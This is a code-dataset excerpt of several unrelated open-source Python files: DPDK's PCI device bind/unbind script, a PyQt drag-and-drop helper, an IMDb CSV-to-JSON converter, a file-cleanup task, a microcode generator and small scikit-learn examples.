None}\n\nvirtio_blk = {'Class': '01', 'Vendor': \"1af4\", 'Device': '1001,1042',\n 'SVendor': None, 'SDevice': None}\n\nnetwork_devices = [network_class, cavium_pkx, avp_vnic, ifpga_class]\nbaseband_devices = [acceleration_class]\ncrypto_devices = [encryption_class, intel_processor_class]\ndma_devices = [cnxk_dma, hisilicon_dma,\n intel_idxd_spr, intel_ioat_bdw, intel_ioat_icx, intel_ioat_skx]\neventdev_devices = [cavium_sso, cavium_tim, intel_dlb, cnxk_sso]\nmempool_devices = [cavium_fpa, cnxk_npa]\ncompress_devices = [cavium_zip]\nregex_devices = [cn9k_ree]\nmisc_devices = [cnxk_bphy, cnxk_bphy_cgx, cnxk_inl_dev,\n intel_ntb_skx, intel_ntb_icx,\n virtio_blk]\n\n# global dict ethernet devices present. Dictionary indexed by PCI address.\n# Each device within this is itself a dictionary of device properties\ndevices = {}\n# list of supported DPDK drivers\ndpdk_drivers = [\"igb_uio\", \"vfio-pci\", \"uio_pci_generic\"]\n# list of currently loaded kernel modules\nloaded_modules = None\n\n# command-line arg flags\nb_flag = None\nstatus_flag = False\nforce_flag = False\nargs = []\n\n\n# check if a specific kernel module is loaded\ndef module_is_loaded(module):\n global loaded_modules\n\n if module == 'vfio_pci':\n module = 'vfio-pci'\n\n if loaded_modules:\n return module in loaded_modules\n\n # Get list of sysfs modules (both built-in and dynamically loaded)\n sysfs_path = '/sys/module/'\n\n # Get the list of directories in sysfs_path\n sysfs_mods = [m for m in os.listdir(sysfs_path)\n if os.path.isdir(os.path.join(sysfs_path, m))]\n\n # special case for vfio_pci (module is named vfio-pci,\n # but its .ko is named vfio_pci)\n sysfs_mods = [a if a != 'vfio_pci' else 'vfio-pci' for a in sysfs_mods]\n\n loaded_modules = sysfs_mods\n\n # add built-in modules as loaded\n release = platform.uname().release\n filename = os.path.join(\"/lib/modules/\", release, \"modules.builtin\")\n if os.path.exists(filename):\n try:\n with open(filename) as f:\n loaded_modules += [os.path.splitext(os.path.basename(mod))[0] for mod in f]\n except IOError:\n print(\"Warning: cannot read list of built-in kernel modules\")\n\n return module in loaded_modules\n\n\ndef check_modules():\n '''Checks that igb_uio is loaded'''\n global dpdk_drivers\n\n # list of supported modules\n mods = [{\"Name\": driver, \"Found\": False} for driver in dpdk_drivers]\n\n # first check if module is loaded\n for mod in mods:\n if module_is_loaded(mod[\"Name\"]):\n mod[\"Found\"] = True\n\n # check if we have at least one loaded module\n if True not in [mod[\"Found\"] for mod in mods] and b_flag is not None:\n print(\"Warning: no supported DPDK kernel modules are loaded\", file=sys.stderr)\n\n # change DPDK driver list to only contain drivers that are loaded\n dpdk_drivers = [mod[\"Name\"] for mod in mods if mod[\"Found\"]]\n\n\ndef has_driver(dev_id):\n '''return true if a device is assigned to a driver. False otherwise'''\n return \"Driver_str\" in devices[dev_id]\n\n\ndef get_pci_device_details(dev_id, probe_lspci):\n '''This function gets additional details for a PCI device'''\n device = {}\n\n if probe_lspci:\n extra_info = subprocess.check_output([\"lspci\", \"-vmmks\", dev_id]).splitlines()\n # parse lspci details\n for line in extra_info:\n if not line:\n continue\n name, value = line.decode(\"utf8\").split(\"\\t\", 1)\n name = name.strip(\":\") + \"_str\"\n device[name] = value\n # check for a unix interface name\n device[\"Interface\"] = \"\"\n for base, dirs, _ in os.walk(\"/sys/bus/pci/devices/%s/\" % dev_id):\n if \"net\" in dirs:\n device[\"Interface\"] = \\\n \",\".join(os.listdir(os.path.join(base, \"net\")))\n break\n # check if a port is used for ssh connection\n device[\"Ssh_if\"] = False\n device[\"Active\"] = \"\"\n\n return device\n\n\ndef clear_data():\n '''This function clears any old data'''\n global devices\n devices = {}\n\n\ndef get_device_details(devices_type):\n '''This function populates the \"devices\" dictionary. The keys used are\n the pci addresses (domain:bus:slot.func). The values are themselves\n dictionaries - one for each NIC.'''\n global devices\n global dpdk_drivers\n\n # first loop through and read details for all devices\n # request machine readable format, with numeric IDs and String\n dev = {}\n dev_lines = subprocess.check_output([\"lspci\", \"-Dvmmnnk\"]).splitlines()\n for dev_line in dev_lines:\n if not dev_line:\n if device_type_match(dev, devices_type):\n # Replace \"Driver\" with \"Driver_str\" to have consistency of\n # of dictionary key names\n if \"Driver\" in dev.keys():\n dev[\"Driver_str\"] = dev.pop(\"Driver\")\n if \"Module\" in dev.keys():\n dev[\"Module_str\"] = dev.pop(\"Module\")\n # use dict to make copy of dev\n devices[dev[\"Slot\"]] = dict(dev)\n # Clear previous device's data\n dev = {}\n else:\n name, value = dev_line.decode(\"utf8\").split(\"\\t\", 1)\n value_list = value.rsplit(' ', 1)\n if value_list:\n # String stored in _str\n dev[name.rstrip(\":\") + '_str'] = value_list[0]\n # Numeric IDs\n dev[name.rstrip(\":\")] = value_list[len(value_list) - 1] \\\n .rstrip(\"]\").lstrip(\"[\")\n\n if devices_type == network_devices:\n # check what is the interface if any for an ssh connection if\n # any to this host, so we can mark it later.\n ssh_if = []\n route = subprocess.check_output([\"ip\", \"-o\", \"route\"])\n # filter out all lines for 169.254 routes\n route = \"\\n\".join(filter(lambda ln: not ln.startswith(\"169.254\"),\n route.decode().splitlines()))\n rt_info = route.split()\n for i in range(len(rt_info) - 1):\n if rt_info[i] == \"dev\":\n ssh_if.append(rt_info[i + 1])\n\n # based on the basic info, get extended text details\n for d in devices.keys():\n if not device_type_match(devices[d], devices_type):\n continue\n\n # get additional info and add it to existing data\n devices[d] = devices[d].copy()\n # No need to probe lspci\n devices[d].update(get_pci_device_details(d, False).items())\n\n if devices_type == network_devices:\n for _if in ssh_if:\n if _if in devices[d][\"Interface\"].split(\",\"):\n devices[d][\"Ssh_if\"] = True\n devices[d][\"Active\"] = \"*Active*\"\n break\n\n # add igb_uio to list of supporting modules if needed\n if \"Module_str\" in devices[d]:\n for driver in dpdk_drivers:\n if driver not in devices[d][\"Module_str\"]:\n devices[d][\"Module_str\"] = \\\n devices[d][\"Module_str\"] + \",%s\" % driver\n else:\n devices[d][\"Module_str\"] = \",\".join(dpdk_drivers)\n\n # make sure the driver and module strings do not have any duplicates\n if has_driver(d):\n modules = devices[d][\"Module_str\"].split(\",\")\n if devices[d][\"Driver_str\"] in modules:\n modules.remove(devices[d][\"Driver_str\"])\n devices[d][\"Module_str\"] = \",\".join(modules)\n\n\ndef device_type_match(dev, devices_type):\n for i in range(len(devices_type)):\n param_count = len(\n [x for x in devices_type[i].values() if x is not None])\n match_count = 0\n if dev[\"Class\"][0:2] == devices_type[i][\"Class\"]:\n match_count = match_count + 1\n for key in devices_type[i].keys():\n if key != 'Class' and devices_type[i][key]:\n value_list = devices_type[i][key].split(',')\n for value in value_list:\n if value.strip(' ') == dev[key]:\n match_count = match_count + 1\n # count must be the number of non None parameters to match\n if match_count == param_count:\n return True\n return False\n\n\ndef dev_id_from_dev_name(dev_name):\n '''Take a device \"name\" - a string passed in by user to identify a NIC\n device, and determine the device id - i.e. the domain:bus:slot.func - for\n it, which can then be used to index into the devices array'''\n\n # check if it's already a suitable index\n if dev_name in devices:\n return dev_name\n # check if it's an index just missing the domain part\n if \"0000:\" + dev_name in devices:\n return \"0000:\" + dev_name\n\n # check if it's an interface name, e.g. eth1\n for d in devices.keys():\n if dev_name in devices[d][\"Interface\"].split(\",\"):\n return devices[d][\"Slot\"]\n # if nothing else matches - error\n raise ValueError(\"Unknown device: %s. \"\n \"Please specify device in \\\"bus:slot.func\\\" format\" % dev_name)\n\n\ndef unbind_one(dev_id, force):\n '''Unbind the device identified by \"dev_id\" from its current driver'''\n dev = devices[dev_id]\n if not has_driver(dev_id):\n print(\"Notice: %s %s %s is not currently managed by any driver\" %\n (dev[\"Slot\"], dev[\"Device_str\"], dev[\"Interface\"]), file=sys.stderr)\n return\n\n # prevent us disconnecting ourselves\n if dev[\"Ssh_if\"] and not force:\n print(\"Warning: routing table indicates that interface %s is active. \"\n \"Skipping unbind\" % dev_id, file=sys.stderr)\n return\n\n # write to /sys to unbind\n filename = \"/sys/bus/pci/drivers/%s/unbind\" % dev[\"Driver_str\"]\n try:\n f = open(filename, \"a\")\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot open %s: %s\" %\n (dev_id, filename, err))\n f.write(dev_id)\n f.close()\n\n\ndef bind_one(dev_id, driver, force):\n '''Bind the device given by \"dev_id\" to the driver \"driver\". If the device\n is already bound to a different driver, it will be unbound first'''\n dev = devices[dev_id]\n saved_driver = None # used to rollback any unbind in case of failure\n\n # prevent disconnection of our ssh session\n if dev[\"Ssh_if\"] and not force:\n print(\"Warning: routing table indicates that interface %s is active. \"\n \"Not modifying\" % dev_id, file=sys.stderr)\n return\n\n # unbind any existing drivers we don't want\n if has_driver(dev_id):\n if dev[\"Driver_str\"] == driver:\n print(\"Notice: %s already bound to driver %s, skipping\" %\n (dev_id, driver), file=sys.stderr)\n return\n saved_driver = dev[\"Driver_str\"]\n unbind_one(dev_id, force)\n dev[\"Driver_str\"] = \"\" # clear driver string\n\n # For kernels >= 3.15 driver_override can be used to specify the driver\n # for a device rather than relying on the driver to provide a positive\n # match of the device. The existing process of looking up\n # the vendor and device ID, adding them to the driver new_id,\n # will erroneously bind other devices too which has the additional burden\n # of unbinding those devices\n if driver in dpdk_drivers:\n filename = \"/sys/bus/pci/devices/%s/driver_override\" % dev_id\n if exists(filename):\n try:\n f = open(filename, \"w\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n return\n try:\n f.write(\"%s\" % driver)\n f.close()\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot write driver %s to \"\n \"PCI ID: %s\" % (dev_id, driver, err), file=sys.stderr)\n return\n # For kernels < 3.15 use new_id to add PCI id's to the driver\n else:\n filename = \"/sys/bus/pci/drivers/%s/new_id\" % driver\n try:\n f = open(filename, \"w\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n return\n try:\n # Convert Device and Vendor Id to int to write to new_id\n f.write(\"%04x %04x\" % (int(dev[\"Vendor\"], 16),\n int(dev[\"Device\"], 16)))\n f.close()\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot write new PCI ID to \"\n \"driver %s: %s\" % (dev_id, driver, err), file=sys.stderr)\n return\n\n # do the bind by writing to /sys\n filename = \"/sys/bus/pci/drivers/%s/bind\" % driver\n try:\n f = open(filename, \"a\")\n except OSError as err:\n print(\"Error: bind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err), file=sys.stderr)\n if saved_driver is not None: # restore any previous driver\n bind_one(dev_id, saved_driver, force)\n return\n try:\n f.write(dev_id)\n f.close()\n except OSError as err:\n # for some reason, closing dev_id after adding a new PCI ID to new_id\n # results in IOError. however, if the device was successfully bound,\n # we don't care for any errors and can safely ignore IOError\n tmp = get_pci_device_details(dev_id, True)\n if \"Driver_str\" in tmp and tmp[\"Driver_str\"] == driver:\n return\n print(\"Error: bind failed for %s - Cannot bind to driver %s: %s\"\n % (dev_id, driver, err), file=sys.stderr)\n if saved_driver is not None: # restore any previous driver\n bind_one(dev_id, saved_driver, force)\n return\n\n # For kernels > 3.15 driver_override is used to bind a device to a driver.\n # Before unbinding it, overwrite driver_override with empty string so that\n # the device can be bound to any other driver\n filename = \"/sys/bus/pci/devices/%s/driver_override\" % dev_id\n if exists(filename):\n try:\n f = open(filename, \"w\")\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot open %s: %s\"\n % (dev_id, filename, err))\n try:\n f.write(\"\\00\")\n f.close()\n except OSError as err:\n sys.exit(\"Error: unbind failed for %s - Cannot write %s: %s\"\n % (dev_id, filename, err))\n\n\ndef unbind_all(dev_list, force=False):\n \"\"\"Unbind method, takes a list of device locations\"\"\"\n\n if dev_list[0] == \"dpdk\":\n for d in devices.keys():\n if \"Driver_str\" in devices[d]:\n if devices[d][\"Driver_str\"] in dpdk_drivers:\n unbind_one(devices[d][\"Slot\"], force)\n return\n\n try:\n dev_list = map(dev_id_from_dev_name, dev_list)\n except ValueError as ex:\n print(ex)\n sys.exit(1)\n\n for d in dev_list:\n unbind_one(d, force)\n\n\ndef bind_all(dev_list, driver, force=False):\n \"\"\"Bind method, takes a list of device locations\"\"\"\n global devices\n\n # a common user error is to forget to specify the driver the devices need to\n # be bound to. check if the driver is a valid device, and if it is, show\n # a meaningful error.\n try:\n dev_id_from_dev_name(driver)\n # if we've made it this far, this means that the \"driver\" was a valid\n # device string, so it's probably not a valid driver name.\n sys.exit(\"Error: Driver '%s' does not look like a valid driver. \"\n \"Did you forget to specify the driver to bind devices to?\" % driver)\n except ValueError:\n # driver generated error - it's not a valid device ID, so all is well\n pass\n\n # check if we're attempting to bind to a driver that isn't loaded\n if not module_is_loaded(driver.replace('-', '_')):\n sys.exit(\"Error: Driver '%s' is not loaded.\" % driver)\n\n try:\n dev_list = map(dev_id_from_dev_name, dev_list)\n except ValueError as ex:\n sys.exit(ex)\n\n for d in dev_list:\n bind_one(d, driver, force)\n\n # For kernels < 3.15 when binding devices to a generic driver\n # (i.e. one that doesn't have a PCI ID table) using new_id, some devices\n # that are not bound to any other driver could be bound even if no one has\n # asked them to. hence, we check the list of drivers again, and see if\n # some of the previously-unbound devices were erroneously bound.\n if not exists(\"/sys/bus/pci/devices/%s/driver_override\" % d):\n for d in devices.keys():\n # skip devices that were already bound or that we know should be bound\n if \"Driver_str\" in devices[d] or d in dev_list:\n continue\n\n # update information about this device\n devices[d] = dict(devices[d].items()\n + get_pci_device_details(d, True).items())\n\n # check if updated information indicates that the device was bound\n if \"Driver_str\" in devices[d]:\n unbind_one(d, force)\n\n\ndef display_devices(title, dev_list, extra_params=None):\n '''Displays to the user the details of a list of devices given in\n \"dev_list\". The \"extra_params\" parameter, if given, should contain a string\n with %()s fields in it for replacement by the named fields in each\n device's dictionary.'''\n strings = [] # this holds the strings to print. We sort before printing\n print(\"\\n%s\" % title)\n print(\"=\" * len(title))\n if not dev_list:\n strings.append(\"\")\n else:\n for dev in dev_list:\n if extra_params is not None:\n strings.append(\"%s '%s %s' %s\" % (dev[\"Slot\"],\n dev[\"Device_str\"],\n dev[\"Device\"],\n extra_params % dev))\n else:\n strings.append(\"%s '%s'\" % (dev[\"Slot\"], dev[\"Device_str\"]))\n # sort before printing, so that the entries appear in PCI order\n strings.sort()\n print(\"\\n\".join(strings)) # print one per line\n\n\ndef show_device_status(devices_type, device_name, if_field=False):\n global dpdk_drivers\n kernel_drv = []\n dpdk_drv = []\n no_drv = []\n\n # split our list of network devices into the three categories above\n for d in devices.keys():\n if device_type_match(devices[d], devices_type):\n if not has_driver(d):\n no_drv.append(devices[d])\n continue\n if devices[d][\"Driver_str\"] in dpdk_drivers:\n dpdk_drv.append(devices[d])\n else:\n kernel_drv.append(devices[d])\n\n n_devs = len(dpdk_drv) + len(kernel_drv) + len(no_drv)\n\n # don't bother displaying anything if there are no devices\n if n_devs == 0:\n msg = \"No '%s' devices detected\" % device_name\n print(\"\")\n print(msg)\n print(\"\".join('=' * len(msg)))\n return\n\n # print each category separately, so we can clearly see what's used by DPDK\n if dpdk_drv:\n display_devices(\"%s devices using DPDK-compatible driver\" % device_name,\n dpdk_drv, \"drv=%(Driver_str)s unused=%(Module_str)s\")\n if kernel_drv:\n if_text = \"\"\n if if_field:\n if_text = \"if=%(Interface)s \"\n display_devices(\"%s devices using kernel driver\" % device_name, kernel_drv,\n if_text + \"drv=%(Driver_str)s \"\n \"unused=%(Module_str)s %(Active)s\")\n if no_drv:\n display_devices(\"Other %s devices\" % device_name, no_drv,\n \"unused=%(Module_str)s\")\n\n\ndef show_status():\n '''Function called when the script is passed the \"--status\" option.\n Displays to the user what devices are bound to the igb_uio driver, the\n kernel driver or to no driver'''\n\n if status_dev in [\"net\", \"all\"]:\n show_device_status(network_devices, \"Network\", if_field=True)\n\n if status_dev in [\"baseband\", \"all\"]:\n show_device_status(baseband_devices, \"Baseband\")\n\n if status_dev in [\"crypto\", \"all\"]:\n show_device_status(crypto_devices, \"Crypto\")\n\n if status_dev in [\"dma\", \"all\"]:\n show_device_status(dma_devices, \"DMA\")\n\n if status_dev in [\"event\", \"all\"]:\n show_device_status(eventdev_devices, \"Eventdev\")\n\n if status_dev in [\"mempool\", \"all\"]:\n show_device_status(mempool_devices, \"Mempool\")\n\n if status_dev in [\"compress\", \"all\"]:\n show_device_status(compress_devices, \"Compress\")\n\n if status_dev in [\"misc\", \"all\"]:\n show_device_status(misc_devices, \"Misc (rawdev)\")\n\n if status_dev in [\"regex\", \"all\"]:\n show_device_status(regex_devices, \"Regex\")\n\n\ndef pci_glob(arg):\n '''Returns a list containing either:\n * List of PCI B:D:F matching arg, using shell wildcards e.g. 80:04.*\n * Only the passed arg if matching list is empty'''\n sysfs_path = \"/sys/bus/pci/devices\"\n for _glob in [arg, '0000:' + arg]:\n paths = [basename(path) for path in glob(path_join(sysfs_path, _glob))]\n if paths:\n return paths\n return [arg]\n\n\ndef parse_args():\n '''Parses the command-line arguments given by the user and takes the\n appropriate action for each'''\n global b_flag\n global status_flag\n global status_dev\n global force_flag\n global args\n\n parser = argparse.ArgumentParser(\n description='Utility to bind and unbind devices from Linux kernel',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\"\"\nExamples:\n---------\n\nTo display current device status:\n %(prog)s --status\n\nTo display current network device status:\n %(prog)s --status-dev net\n\nTo bind eth1 from the current driver and move to use vfio-pci\n %(prog)s --bind=vfio-pci eth1\n\nTo unbind 0000:01:00.0 from using any driver\n %(prog)s -u 0000:01:00.0\n\nTo bind 0000:02:00.0 and 0000:02:00.1 to the ixgbe kernel driver\n %(prog)s -b ixgbe 02:00.0 02:00.1\n\"\"\")\n\n parser.add_argument(\n '-s',\n '--status',\n action='store_true',\n help=\"Print the current status of all known devices.\")\n parser.add_argument(\n '--status-dev',\n help=\"Print the status of given device group.\",\n choices=['baseband', 'compress', 'crypto', 'dma', 'event',\n 'mempool', 'misc', 'net', 'regex'])\n bind_group = parser.add_mutually_exclusive_group()\n bind_group.add_argument(\n '-b',\n '--bind',\n metavar='DRIVER',\n help=\"Select the driver to use or \\\"none\\\" to unbind the device\")\n bind_group.add_argument(\n '-u',\n '--unbind',\n action='store_true',\n help=\"Unbind a device (equivalent to \\\"-b none\\\")\")\n parser.add_argument(\n '--force',\n action='store_true',\n help=\"\"\"\nOverride restriction on binding devices in use by Linux\"\nWARNING: This can lead to loss of network connection and should be used with caution.\n\"\"\")\n parser.add_argument(\n 'devices',\n metavar='DEVICE',\n nargs='*',\n help=\"\"\"\nDevice specified as PCI \"domain:bus:slot.func\" syntax or \"bus:slot.func\" syntax.\nFor devices bound to Linux kernel drivers, they may be referred to by interface name.\n\"\"\")\n\n opt = parser.parse_args()\n\n if opt.status_dev:\n status_flag = True\n status_dev = opt.status_dev\n if opt.status:\n status_flag = True\n status_dev = \"all\"\n if opt.force:\n force_flag = True\n if opt.bind:\n b_flag = opt.bind\n elif opt.unbind:\n b_flag = \"none\"\n args = opt.devices\n\n if not b_flag and not status_flag:\n print(\"Error: No action specified for devices. \"\n \"Please give a --bind, --ubind or --status option\",\n file=sys.stderr)\n parser.print_usage()\n sys.exit(1)\n\n if b_flag and not args:\n print(\"Error: No devices specified.\", file=sys.stderr)\n parser.print_usage()\n sys.exit(1)\n\n # resolve any PCI globs in the args\n new_args = []\n for arg in args:\n new_args.extend(pci_glob(arg))\n args = new_args\n\n\ndef do_arg_actions():\n '''do the actual action requested by the user'''\n global b_flag\n global status_flag\n global force_flag\n global args\n\n if b_flag in [\"none\", \"None\"]:\n unbind_all(args, force_flag)\n elif b_flag is not None:\n bind_all(args, b_flag, force_flag)\n if status_flag:\n if b_flag is not None:\n clear_data()\n # refresh if we have changed anything\n get_device_details(network_devices)\n get_device_details(baseband_devices)\n get_device_details(crypto_devices)\n get_device_details(dma_devices)\n get_device_details(eventdev_devices)\n get_device_details(mempool_devices)\n get_device_details(compress_devices)\n get_device_details(regex_devices)\n get_device_details(misc_devices)\n show_status()\n\n\ndef main():\n '''program main function'''\n # check if lspci is installed, suppress any output\n with open(os.devnull, 'w') as devnull:\n ret = subprocess.call(['which', 'lspci'],\n stdout=devnull, stderr=devnull)\n if ret != 0:\n sys.exit(\"'lspci' not found - please install 'pciutils'\")\n parse_args()\n check_modules()\n clear_data()\n get_device_details(network_devices)\n get_device_details(baseband_devices)\n get_device_details(crypto_devices)\n get_device_details(dma_devices)\n get_device_details(eventdev_devices)\n get_device_details(mempool_devices)\n get_device_details(compress_devices)\n get_device_details(regex_devices)\n get_device_details(misc_devices)\n do_arg_actions()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"F-Stack/f-stack","sub_path":"dpdk/usertools/dpdk-devbind.py","file_name":"dpdk-devbind.py","file_ext":"py","file_size_in_byte":29461,"program_lang":"python","lang":"en","doc_type":"code","stars":3600,"dataset":"github-code","pt":"54"} +{"seq_id":"22376927729","text":"import os\nfrom pathlib import Path\nBASE_DIR = Path(__file__).resolve().parent.parent\n\ndef ImagetopdfDeleteImagesTrigger():\n print(\"ImagetopdfDeleteImagesTrigger triggered\")\n dir = os.path.join(BASE_DIR,'imagetopdf/files/images')\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n print(\"ImagetopdfDeleteImagesTrigger completed\")\n \n\ndef ImagetopdfDeletePDFTrigger():\n print(\"ImagetopdfDeletePDFTrigger triggered\")\n dir = os.path.join(BASE_DIR,'imagetopdf/files/pdfs')\n for f in os.listdir(dir):\n os.remove(os.path.join(dir, f))\n print(\"ImagetopdfDeletePDFTrigger completed\")","repo_name":"saint-mantis/nb-1","sub_path":"imagetopdf/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"35002367406","text":"from pathlib import PurePath\n\nimport PyQt5.QtCore as qcore\nimport PyQt5.QtGui as qgui\nimport PyQt5.QtWidgets as qt\n\nclass DragDropHandler():\n \"\"\"This class provides a higher-level wrapper around the Qt drag and\n drop event handlers. This class can be inhereited so it can make\n use of methods that let you easily activate or deactivate QWidiget\n event handlers that can respond to dropping files from some other\n application in the operating system into your GUIs window.\n\n If you inherit from this class, you MUST also inherit from QWidget\n or a child of QWidget. That is because the \"setAcceptsDrops()\"\n method is called by the methods in this class.\n\n There are two methods you should override:\n\n - 'drop_url_handler(urls)' which takes a list of QUrl objects as\n an argument.\n\n - 'drop_text_handler(text)' which takes a string as an argument.\n\n Any class that inherits from this class will be able to enable or\n disable drag and drop, by simply calling the\n 'enable_drop_handlers()' method. You can also enable or disable\n each handler individually, however it is best to enable both or\n neither, since the operating system may not recognize file paths\n as URLs and input them to the program as text instead. Your\n program should be ready to handle either situation.\n \"\"\"\n\n def __init__(self):\n self._drop_url_handler = False\n self._drop_text_handler = False\n\n def reset_accepts_drops(self):\n enable = self._drop_text_handler or self._drop_url_handler\n #print(f'DragDropHandler.reset_accepts_drops() #( {self}.setAcceptDrops({enable}) )')\n self.setAcceptDrops(enable)\n\n def drop_url_handler(self, urls):\n \"\"\"This is the default event handler that does nothing but print a log\n message.\"\"\"\n print(f'DragDropHandler.drop_url_handler() #(urls: {urls})')\n\n def drop_text_handler(self, text):\n \"\"\"This is the default event handler that does nothing but print a log\n message.\"\"\"\n print(f'DragDropHandler.drop_url_handler() #(text: \"{text}\")')\n\n def enable_drop_text_handler(self, boolean):\n self._drop_text_handler = boolean\n self.reset_accept_drops()\n\n def enable_drop_url_handler(self, boolean):\n self._drop_url_handler = boolean\n self.reset_accept_drops()\n\n def enable_drop_handlers(self, boolean):\n \"\"\"Enable both URL and text drop handlers at once. This function\n assumes you have overridden the drop_text_handler() and\n drop_url_handler() methods.\n\n \"\"\"\n self._drop_url_handler = boolean\n self._drop_text_handler = boolean\n self.reset_accepts_drops()\n\n def dragEnterEvent(self, event):\n #print(f'DragDropHandler.dragEnterEvent() #(self = {self})')\n mime_data = event.mimeData()\n if mime_data.hasUrls():\n urls = mime_data.urls()\n if len(urls) > 0:\n return event.accept()\n else:\n #print(f'DragDropHandler.dragEnterEvent() #(len(urls) <= 0: ignore)')\n return event.ignore()\n elif mime_data.hasText():\n return event.accept()\n else:\n #print(f'DragDropHandler.dragEnterEvent() #(mime_data: hasUrls() -> False, hasText() -> False)')\n return event.ignore()\n\n def dragMoveEvent(self, event):\n # I do not know why, but unless this overridden method accepts\n # all events, drag and drop does not work properly.\n # Fortunately, this event handler is not triggered anyway if\n # the dragEnterEvent() method above evaluates\n # \"event.ignore()\", so there is no need to run all the checks\n # on the event again. Just evaluate \"event.accept()\".\n return event.accept()\n\n def dropEvent(self, event):\n #print(f'DragDropHandler.dropEvent() #(self = {self})')\n mime_data = event.mimeData()\n if mime_data.hasUrls() and self._drop_url_handler:\n urls = mime_data.urls()\n urls = list(\n map(( lambda url: \\\n PurePath(url.toLocalFile()) if \\\n url.isLocalFile() else \\\n url\n ),\n urls,\n ),\n )\n #print(f'DragDropHandler.dropEvent() #(urls: {urls})')\n return self.drop_url_handler(urls)\n elif mime_data.hasText() and self._drop_text_handler:\n text = mime_data.text()\n #print(f'DragDropHandler.dropEvent() #(text: {text})')\n event.accept()\n return self.drop_text_handler(text)\n else:\n #print(f'DragDropHandler.dropEvent() #( event.ignore() )')\n return event.ignore()\n","repo_name":"ramin-honary-xc/data-prep-kit","sub_path":"DataPrepKit/DragDropHandler.py","file_name":"DragDropHandler.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2958253576","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nimport os\nimport json\nimport csv\n\nclass IMDBMovieJson():\n def __init__(self, filename):\n self.filename = filename\n self.file = open( filename, 'r' )\n\n def convert_csv_to_json(self):\n\n header = self.file.readline().replace(\".\", \"\")\n reader = csv.DictReader( self.file, fieldnames = ( header.replace(\"\\\"\", \"\").split(\",\") ) )\n\n movie_list = []\n username = \"\"\n\n for row in reader:\n username = self.__find_username(row)\n\n row[\"rated\"] = int(row[username])\n \n #this just because the Moneyball doesn't come with rate\n row[\"IMDb Rating\"] = 7 if row[\"IMDb Rating\"] is \"\" else float(row[\"IMDb Rating\"])\n #row[\"IMDb Rating\"] = float(row[\"IMDb Rating\"])\n\n row[\"Runtime (mins)\"] = 0 if row[\"Runtime (mins)\"] is \"\" else int(row[\"Runtime (mins)\"])\n movie_list.append(row)\n\n '''\n Actors\n '''\n\n '''\n import urllib2\n imdb_id = row[\"const\"]\n link = \"http://www.omdbapi.com/?i=\"+imdb_id\n response = urllib2.urlopen(link)\n movie_data = response.read()\n #print json.loads(movie_data).get(\"Actors\")\n row[\"actors\"] = json.loads(movie_data).get(\"Actors\")\n '''\n\n '''\n import urllib2\n imdb_id = row[\"const\"]\n link = \"http://mymovieapi.com/?type=json&id=\"+imdb_id\n response = urllib2.urlopen(link)\n movie_data = response.read()\n #print json.loads(movie_data).get(\"actors\")\n row[\"actors\"] = json.loads(movie_data).get(\"actors\")\n print \"ok\"\n '''\n\n\n stringfile = json.dumps( [ row for row in movie_list ] , indent=4)\n movies_json = json.loads(stringfile)\n\n os.remove(self.filename)\n return movies_json\n\n def __find_username(self, row):\n for key in row.keys():\n if key.endswith(\" rated\"):\n return key\n return \"\"\n\n#----------------------------------------\n#Init\n#----------------------------------------\nif __name__ == \"__main__\":\n IMDBMovieJson('imdbmovies/temp/movies.csv').convert_csv_to_json()\n","repo_name":"AleUehara/moviestatz","sub_path":"core/movieimdb/moviejson.py","file_name":"moviejson.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20717364640","text":"# coding=utf-8\n\nimport os\nimport pin\nimport assembly as ASM\n\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, 'micro.bin')\n\nmicro = [pin.HLT for _ in range(0x10000)]\n\nfor addr in range(0x10000):\n ir = addr >> 8\n psw = (addr >> 4) & 0xf\n cyc = addr & 0xf\n\n if cyc < len(ASM.FETCH):\n micro[addr] = ASM.FETCH[cyc]\n\nwith open(filename, 'wb') as file:\n for var in micro:\n value = var.to_bytes(4, byteorder='little')\n file.write(value)\n\nprint('Compile micro instruction finish!!!')\n","repo_name":"StevenBaby/computer","sub_path":"cpu/26 取指令微程序/cpu/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"54"} +{"seq_id":"31616486058","text":"# encoding=utf-8\n# 调用sklearn库运行 k邻近 分类算法\n# 作者:dyxm\n\nfrom sklearn import neighbors\nfrom sklearn import datasets\n\n# 分类器\nknn = neighbors.KNeighborsClassifier()\n\n# 加载数据集\niris = datasets.load_iris()\n# print (iris)\n \n# 建立模型\nknn.fit(iris.data, iris.target)\n\n# 构建测试数据\nnewX = [0.1, 0.2, 0.3, 0.4]\n# 调用模型预测\npredictedLabel = knn.predict(newX)\n# 类别编号\nprint (predictedLabel)\n# 类别名\nprint ( iris.target_names[predictedLabel])","repo_name":"dyxm/machineLearning","sub_path":"kNeighbors/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"22316093382","text":"import pandas as pd\nfrom sklearn.datasets import load_digits\n\n#Creating load_digits object\ndigits = load_digits()\n#Looking for features of dataset\nprint(dir(digits))\nprint(digits.target_names)\n\n#Creating dataframe\ndf = pd.DataFrame(digits.data,columns=digits.feature_names)\nprint(df.head())\n\n#Creating target column in dataframe\ndf[\"target\"] = 